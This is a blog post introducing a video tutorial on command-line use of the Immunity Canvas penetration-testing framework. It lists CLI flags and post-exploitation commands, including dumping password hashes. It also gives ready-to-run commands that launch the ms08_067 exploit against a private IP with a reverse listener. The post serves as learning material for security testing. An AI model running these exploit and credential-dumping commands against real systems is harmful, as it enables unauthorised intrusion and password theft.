This weekend was my first time playing around with Immunity Canvas. I noticed a lack of documentation for anything Non-Gui based regarding the framework. Since i had such a hard time tracking down information I decided to make a video showing Canvas basic CMDLine usage and tried to explain some module code based on my initial analysis I hope it helps
Note:
I have no previous experience with Canvas but this 20 minute video is everything I learned after playing around for a couple hours and searching everywhere for info..
Whats in this video:
-High Level Explanation of 2 modules(Exploit and Aux)
-CmdLine usage for launching exploits and Aux Modules
-Using PostEx modules after gaining a shell
-Setting up Listeners and finding modules to run
Immunity Canvas Code and CMDLine Walkthrough from ficti0n on Vimeo.
CMDLINE Flags:
-t Target
-p Port
-v Version of OS/target
-l Your listening IP
-d Your Listening port
PostEx Stuff:
help
runmodule getpasswordhashes
shellshocked
ps
killprocess
Running Exploit Without a Listener
./exploits/ms08_067/ms08_067.py -t 192.168.1.65 -v
Running Exploit with Listener
./commandlineinterface.py -v 10 -p 4445
./exploits/ms08_067/ms08_067.py -t 192.168.1.65 -l 192.168.1.121 -d 4445
Subscribe to:
Post Comments (Atom)
NEW Stealth Reader Design - Field notes and use cases covering updated hardware and functionality
Significant changes to the new Stealth Readers that add to performance in the field.. Full overview of the last few generations of readers...
-
"Swan song" is a metaphorical phrase for a final gesture, effort, or performance given just before death or retirement. This post ... -
Firstly this post requires the following song to be playing. http://www.youtube.com/watch?v=wVfjwIyc-CU Now that we got that out of... -
A few months ago I noticed that Citrix provides virtual appliances to test their applications, I decided to pull down an appliance and ...
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.